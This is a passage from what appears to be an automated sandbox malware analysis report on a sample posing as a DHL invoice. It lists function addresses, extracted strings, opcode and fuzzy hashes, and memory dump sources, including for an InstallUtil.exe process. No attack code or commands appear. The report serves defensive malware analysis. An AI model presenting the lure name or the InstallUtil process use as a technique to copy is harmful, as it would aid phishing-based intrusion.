Instruction Fuzzy Hash: CDD0C93144410ADBEB20DB50C51BBEEBAB0BB44306F200416C401B1196C7750E88DB91

Function 05C17BED Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c19bb33daf26b7cb0a94c7a68835015796c68dd77e3397acd68f955582c8f5
Instruction ID: 9fac1b3ea14084d94f028c2a7bf02bb2871d51829a4259c44c3abdde3a6a0b3e
Opcode Fuzzy Hash: c8c19bb33daf26b7cb0a94c7a68835015796c68dd77e3397acd68f955582c8f5
Instruction Fuzzy Hash: 66C00276E5001A9A8B00DAD9E4508DCB774EB94321B004026D214A6104D63115268B50

Function 00A5652B Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f06f6c2fed99283ecdbe9f1af27fd5e5fd02de61f85618c63f1d1edf335c1ec
Instruction ID: fd2ceed314a778eb235838eda3a364257324cfa16e6ea35c026f899df66a3dea
Opcode Fuzzy Hash: 8f06f6c2fed99283ecdbe9f1af27fd5e5fd02de61f85618c63f1d1edf335c1ec
Instruction Fuzzy Hash: A9D06CB8908229CBDB20CF20D945BD8B7B2AB49310F0082DA880EA2610D3705EC18F00

Function 05C2F390 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 05C2320A Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d66b9367f5f2320a974e1e13346f2c6ed4f817073271645bd28899f67d0badf
Instruction ID: bb9d7566b79ef4d6f240a0075926a28453590295d6a5dbc1ff4cac6f7ac7ef4d
Opcode Fuzzy Hash: 7d66b9367f5f2320a974e1e13346f2c6ed4f817073271645bd28899f67d0badf
Instruction Fuzzy Hash: D9A00138790304AFEE2556509A1BF887A24A761B42F560480B6D5A92D2ABD13482CA59

Non-executed Functions

Function 05394FD9 Relevance: 4.0, Strings: 3, Instructions: 243COMMON

Download Yara Rule

Strings

Te^q, xrefs: 0539570B
xbaq, xrefs: 05395115
TJcq, xrefs: 0539518A

Memory Dump Source

Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$xbaq
API String ID: 0-3225726259
Opcode ID: e2f2384db20732d2edcfe9228987855e514b8b16673678551ce715250506b1d2
Instruction ID: 9764a8cadbce46eb644ff4c6fd75f760c0725d7cf121daa5e9502b24f693804e
Opcode Fuzzy Hash: e2f2384db20732d2edcfe9228987855e514b8b16673678551ce715250506b1d2
Instruction Fuzzy Hash: D3B15975E016188FDB58DF6AC984ADDBBF2BF89300F14C1A9D909AB365DB305A81CF50

Function 05C25C78 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

,bq, xrefs: 05C25D6E
(bq, xrefs: 05C2601C

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: (bq$,bq
API String ID: 0-1616511919
Opcode ID: ed2124e48ba0be370ab78b5968fd22a9bfacd3b634dcb785bafb63a7582dd3d0
Instruction ID: bcd865e060d710e4faa702f6416bb35e79faac7632f8dfdd7a158d04ef7ae30c
Opcode Fuzzy Hash: ed2124e48ba0be370ab78b5968fd22a9bfacd3b634dcb785bafb63a7582dd3d0
Instruction Fuzzy Hash: FAD10A34A04614CFCB14DF69C588A6AB7F2FF88310F25C8A9E5069B365DB35ED81CB61

Function 05F74558 Relevance: 1.8, Strings: 1, Instructions: 593COMMON

Download Yara Rule

Strings

(bq, xrefs: 05F74628

Memory Dump Source

Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: a9ab11917f062acbf27d81adac581cc83d4918f83d0ae4e51fd4cc8866320c75
Instruction ID: 55f7a34120c3759592b119581da6b6d8f7b2f794154e00b8721f27e73e761d55
Opcode Fuzzy Hash: a9ab11917f062acbf27d81adac581cc83d4918f83d0ae4e51fd4cc8866320c75
Instruction Fuzzy Hash: 69325975B007198FCB58DF69C498A6EFBF2FB88300F24852AD55AD7381DB34A911CB85

Function 05296E5B Relevance: 1.6, Instructions: 1600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmp, Offset: 05290000, based on PE: true

Associated: 00000000.00000002.2049662868.00000000052E0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5290000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
Instruction ID: af3a642094df821680657aed00c7c12f0b5e731503f59f92828385f5011d58aa
Opcode Fuzzy Hash: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
Instruction Fuzzy Hash: E0C2CE6642E3C25FDB1B8B349DB6AE17FB1EE2321471E04DBD4C18F163E218594AC762

Function 05C1814F Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

&, xrefs: 05C1BAF5

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: &
API String ID: 0-1010288
Opcode ID: bc1b38d21bfd368c05a8f52f73d6a5e1733be2c7566b7bc3d4ed405da7481abe
Instruction ID: e7c8b788ec923ecdd8d8b165bb4cbbe5e049cd57880ea58b549afa6ce7467699
Opcode Fuzzy Hash: bc1b38d21bfd368c05a8f52f73d6a5e1733be2c7566b7bc3d4ed405da7481abe
Instruction Fuzzy Hash: 4D415F71E05A588BEB18CF6B8C4069AFAF3BFC9201F14D5BA980DAA255EB3055819F05

Function 05C161E8 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ccc6458f0d69c6a87c013457df1b349883bb11e9b7d6424edc71aa0bde14956
Instruction ID: 16fdc61c57c1856bfa70ca1e7907a7f2d933872bc074de1eb1fa93abe8007fb4
Opcode Fuzzy Hash: 6ccc6458f0d69c6a87c013457df1b349883bb11e9b7d6424edc71aa0bde14956
Instruction Fuzzy Hash: 2E12D470E046188FDB14CFAAC98069DFBF2FF89304F24C569D419AB21AD734A986CF54

Function 052347E0 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ae6d05c3505623bea438144b8ba7b62d648fe70d8bcf132b2cbaf447b27e7df
Instruction ID: 0c0a4edaceaa5bf15380c0de4b145f1db4f9a00cc43e42d5e21028ada4102124
Opcode Fuzzy Hash: 0ae6d05c3505623bea438144b8ba7b62d648fe70d8bcf132b2cbaf447b27e7df
Instruction Fuzzy Hash: CAD114B0E15358CFDB14EFA9D889B9DBBF6BF89300F1081A9D419AB295CB705985CF40

Function 05F7DD9B Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dca486133d4dea025a4c44d52819311c34b3bde2de60285ef6cf5ceb0823fa12
Instruction ID: 800696263a92ef5119c7ed8afa2e1fae782e0d3597fba7f069f253b29ca88a01
Opcode Fuzzy Hash: dca486133d4dea025a4c44d52819311c34b3bde2de60285ef6cf5ceb0823fa12
Instruction Fuzzy Hash: CD910671E04208CFDB14DFA9D885BADBBFABF49300F50806AD419A73A5CB785984CF00

Function 052E24F8 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049662868.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: true

Associated: 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5290000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 896ceec31201d94d9487091013a1669200938fbf16fbe69a3f5c0fac05f6e357
Instruction ID: 5c0f03a8d8758c1319599d42d6c8c91daddb8c6ccdeb17818a3051ee42dbd340
Opcode Fuzzy Hash: 896ceec31201d94d9487091013a1669200938fbf16fbe69a3f5c0fac05f6e357
Instruction Fuzzy Hash: 3E912174A14208CFDB18DFA8D595BAEB7FAFF89300F50802AE41AA7395CB745946CF14

Function 05F7DDA8 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1af9b80427f6d668bb374ff51dc948cdb2ceba9ea35a3f2a943e76d181c7743
Instruction ID: ad1321fc593a37cac4449d1805c31d6a00047da5fe742fd11adcd0339328837b
Opcode Fuzzy Hash: f1af9b80427f6d668bb374ff51dc948cdb2ceba9ea35a3f2a943e76d181c7743
Instruction Fuzzy Hash: C591F471E05218CFDB14DFA9D885BADBBFABF49300F50806AD519A7395CB786985CF00

Function 0624DD48 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca967143b7e875c547f7ca42119c53b809d911c057694b6e0e9beffd387b5dd
Instruction ID: 41ffbf11f893851ecc2f15376e38c5e66eee08d57d2bdf23477dc274e879d915
Opcode Fuzzy Hash: eca967143b7e875c547f7ca42119c53b809d911c057694b6e0e9beffd387b5dd
Instruction Fuzzy Hash: 8A9120B0E25218CFEBA8EF65C8487DDBBF5BF49304F1088A9C809A7255DB715985CF41

Function 05F7E0CB Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56765932c1b3425199a7819d775302cc580ffd7f18750e7bc45f09f351fb5fb0
Instruction ID: aa0c0aa297cec4f7cdcb3fa217cd9db163c3cfac701e54c76dc0b4da08736459
Opcode Fuzzy Hash: 56765932c1b3425199a7819d775302cc580ffd7f18750e7bc45f09f351fb5fb0
Instruction Fuzzy Hash: BE91E571E04208CFDB14DF69D885BADBBFABF49300F5080AAD519A7395CB78A985CF00

Function 0523DDC8 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a7f735f2cf43b9b39be9280671a51ad44f9ed7d913728ac81f726a9fdb58ee
Instruction ID: 17e1f7fa02d17fe54b793b830db61668e60ff0843bc82e1c68511b98b6c392ef
Opcode Fuzzy Hash: e8a7f735f2cf43b9b39be9280671a51ad44f9ed7d913728ac81f726a9fdb58ee
Instruction Fuzzy Hash: C381CFB0D1521CCBEB24CFA6C885BAEBBB6BF49344F1081AAC419A7251D7B45988CF14

Function 0523DDB8 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2367531bbe0ff612a4ec7003e4abe755505886fa80d69ece63768e841087790e
Instruction ID: cdf77e54e32ecf2872e9a7ecd1c8baa277074af7f28598e543fd71dbceea2a49
Opcode Fuzzy Hash: 2367531bbe0ff612a4ec7003e4abe755505886fa80d69ece63768e841087790e
Instruction Fuzzy Hash: 0671E3B0D1521CCBEB24CFA6C885BEDBBB6BF89340F1081AAC419B7251D7B45988CF50

Function 05F77F38 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c59d8eb876691aa10c311e0c598e760b4fd89412c9967723f12f200f38cff73
Instruction ID: ed06e5f43896438a3d1a0d998449291382fc09a3d014b1216736467a162733ab
Opcode Fuzzy Hash: 1c59d8eb876691aa10c311e0c598e760b4fd89412c9967723f12f200f38cff73
Instruction Fuzzy Hash: D3510570E0620CCFDB14DFA8D948BEDBBF6FB49380F10902AD409A7295DB786945CB44

Function 05F77F28 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3bc89a6d6b77940d497bbdd2bdb1e2861c54702c0bfe2fea3b9dd1c77054a08
Instruction ID: 9f4cd5a18213cdc76e17a93cd609483e301530341c7369f81ad24e901aae99f8
Opcode Fuzzy Hash: e3bc89a6d6b77940d497bbdd2bdb1e2861c54702c0bfe2fea3b9dd1c77054a08
Instruction Fuzzy Hash: FC511570E1620CCFDB14EFA8D988BEDBBF6FB49340F14902AE009A7295CB785945CB44

Function 05C161D8 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 989a58dc4ec3ea9f03aebcbdd16c434583f13816c23454b0f5d185019d841a80
Instruction ID: 1353201ba56d603956f8cdd423e00c10d588d5c64f295d165b44a29750eb1b0a
Opcode Fuzzy Hash: 989a58dc4ec3ea9f03aebcbdd16c434583f13816c23454b0f5d185019d841a80
Instruction Fuzzy Hash: 2E416AB5E056198BDB18CFABD94069EFBF3BFC8300F14C17AD958AB214EB3059468B54

Function 00A525B2 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae0e1bae0d9d0914892b887cd3a7e3c98aa8442d332635a52a071f20eb750548
Instruction ID: bfff399972cc1375cc99f4d29b82a38208b61e68c4191ddf51ae11439e47d40a
Opcode Fuzzy Hash: ae0e1bae0d9d0914892b887cd3a7e3c98aa8442d332635a52a071f20eb750548
Instruction Fuzzy Hash: 73510371D056148BEB2CCF2B8D456CAFAF3AFC9301F14C1FA994CA6264DB740A858F45

Function 053914C0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb72bd385a4f707252084417b72fd033e7d9b06f45f6de82971016615fb274ee
Instruction ID: 01a3842fb05a76b1acd02bfe43f169c9de7823a2f2ea735f5a95087d1bba266b
Opcode Fuzzy Hash: bb72bd385a4f707252084417b72fd033e7d9b06f45f6de82971016615fb274ee
Instruction Fuzzy Hash: F44187B0D056298BEB68CF5ACC4879AFAF6BF89304F14C1A9C40DA6264DB740A85CF01

Function 0539D2C8 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff2b882fbb2fef67ced560a51550923afc0a993e39a2d3382bc0d9d1e94ac34d
Instruction ID: 0d3a5b22b6985d80187c488c48f9ab7bfebcc12b53a30b7e41531c1e4145e6aa
Opcode Fuzzy Hash: ff2b882fbb2fef67ced560a51550923afc0a993e39a2d3382bc0d9d1e94ac34d
Instruction Fuzzy Hash: 6941D8B1D04618CBDB18CF6AC9456DDBBF6AB89301F14C0A9D40DAB314DB355E85CF40

Function 06230040 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47c52a865a70d387b4f371aa2e0474c01adba995a15aa276d98f7e6badb97eea
Instruction ID: 1c68e1865396bb1af07b6948923ddfb50f6d8fc27cb68cd9f464c5f1d872d0c1
Opcode Fuzzy Hash: 47c52a865a70d387b4f371aa2e0474c01adba995a15aa276d98f7e6badb97eea
Instruction Fuzzy Hash: 3041FF70E05668CFEB28DF56C94879ABBF6BF89300F04C0EA990CA7254D7744A85CF11

Function 053914B1 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faa3452cdd462843d18c9cb8918c54a1e7b1566ac47e863e7d9c1e418e900f70
Instruction ID: 74c0251abdfb80bca5345e9b74c96632026c33abb9853dab99ebd9ce30aed7c8
Opcode Fuzzy Hash: faa3452cdd462843d18c9cb8918c54a1e7b1566ac47e863e7d9c1e418e900f70
Instruction Fuzzy Hash: AC3187B1E016188BEB68CF5BCD4578EFAF7AFC9304F14C1A9D40CAA264DB740A468E41

Function 06230033 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17d7022e236ea5b464a3787fbcaeb2cb09d2e6b3a13f8a38bf1a43a6d11cf398
Instruction ID: 54bc0b95011f8d9455bb5dc13d0f332b8c9697d7045893fb7118283034a9cafc
Opcode Fuzzy Hash: 17d7022e236ea5b464a3787fbcaeb2cb09d2e6b3a13f8a38bf1a43a6d11cf398
Instruction Fuzzy Hash: E721E171D056689BE72CCF5BC94939AFAF7BFC8300F14C0BA980CA6214D7744A858E00

Function 05C2BA50 Relevance: 7.7, Strings: 6, Instructions: 152COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C2BB22
4'^q, xrefs: 05C2BB9A
pbq, xrefs: 05C2BBA7
4'^q, xrefs: 05C2BB04
4'^q, xrefs: 05C2BAD4
(bq, xrefs: 05C2BC1A

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
API String ID: 0-723292480
Opcode ID: 4dcce15858171e60ded6086b93f85918e326a5b41dd0fb2808546eb76c78642e
Instruction ID: bf3fdbbbdfc2ec21f8aa9b8388db66244bb13da04a1a4ba0b23185d233cab8e8
Opcode Fuzzy Hash: 4dcce15858171e60ded6086b93f85918e326a5b41dd0fb2808546eb76c78642e
Instruction Fuzzy Hash: F8516E31A402098FC758DB79C9507AFBBE7BFC8300F148928D4099B369DF75AD468BA1

Function 05C1B590 Relevance: 5.0, Strings: 4, Instructions: 29COMMON

Download Yara Rule

Strings

9, xrefs: 05C1B59C
|, xrefs: 05C1B5CC
$, xrefs: 05C1AC0A
M, xrefs: 05C1ABDA

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: $$9$M$|
API String ID: 0-1776002413
Opcode ID: 0c2aed4f138ac49c41de6753e41991aafb89b8738010ec24e3532638faf89210
Instruction ID: e2e861e3003142bfc98d12fc827618920d746217f17fb206d0c30fd1932ef43a
Opcode Fuzzy Hash: 0c2aed4f138ac49c41de6753e41991aafb89b8738010ec24e3532638faf89210
Instruction Fuzzy Hash: 1901E8B080926DCFDB20CF54D948BA9BBB2BB06305F1005E9D909A7241D7784AC4DF5A

Analysis Process: InstallUtil.exePID: 1432, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	17.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.5%
Total number of Nodes:	62
Total number of Limit Nodes:	7

Executed Functions

Function 009C6748 Relevance: 6.7, Strings: 5, Instructions: 470
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 009C69A0
,bq, xrefs: 009C6A0A
,bq, xrefs: 009C6A18
(o^q, xrefs: 009C6CBD
(o^q, xrefs: 009C6992

Memory Dump Source

Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-2525668591
Opcode ID: d51001f78fe75f21bbad226e05570a979015794870c64a2dcccace421f7685ef
Instruction ID: 010090764a0d6ef367f5d9b4821503b4f0405cffad029732bf7a9d74999c62a0
Opcode Fuzzy Hash: d51001f78fe75f21bbad226e05570a979015794870c64a2dcccace421f7685ef
Instruction Fuzzy Hash: 23122B70E042099FCB14CF69C884EADBBB6FF88340F158469E855EB2A1D735ED45CB52

Function 009CB338 Relevance: 6.6, Strings: 5, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 009CB6DF
PH^q, xrefs: 009CB757
PH^q, xrefs: 009CB768
LjAp, xrefs: 009CB6F5
0oAp, xrefs: 009CB572

Memory Dump Source

Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 89a9a01fe100db36fda26d48e7c2ba01adf6fa0cc8f8419310ae011118138195
Instruction ID: d12e498a6c244dd3d3b418ed693b414673d23e1597dbba52b3293e13cdc7f77d
Opcode Fuzzy Hash: 89a9a01fe100db36fda26d48e7c2ba01adf6fa0cc8f8419310ae011118138195
Instruction Fuzzy Hash: 05F10675E04258CFDB18CFA9C985B9DBBB5BF89310F158069E809AB362DB30AD41CF51

Function 009CBAC0 Relevance: 6.5, Strings: 5, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 009CBD28
LjAp, xrefs: 009CBCB5
LjAp, xrefs: 009CBC9F
0oAp, xrefs: 009CBB32
PH^q, xrefs: 009CBD17

Memory Dump Source

Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 5fbab8bcbb8382521685fe64c81bf8b8d54f4b6e5686cbbc6d2a72b93fbdac5a
Instruction ID: 13e3f617917412da700f340b884f24a8016519b7a60cab7c8cc8d2dd7f25dfab
Opcode Fuzzy Hash: 5fbab8bcbb8382521685fe64c81bf8b8d54f4b6e5686cbbc6d2a72b93fbdac5a
Instruction Fuzzy Hash: 9391B174E00208DFDB14DFAAD984B9DBBF2BF88300F249469E419AB365DB349985CF11

Function 009CB7E2 Relevance: 6.4, Strings: 5, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 009CBA37
PH^q, xrefs: 009CBA48
LjAp, xrefs: 009CB9D5
LjAp, xrefs: 009CB9BF
0oAp, xrefs: 009CB852

Memory Dump Source

Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: feca13ece94bcfa8cdbffd201d94782be420cd40f7d7bea6a9b1ecde053a172b
Instruction ID: 2d9d965af23a0cc2fad7f0d3e7f2765077a6c19c7f17135d8a788eed25bf2073
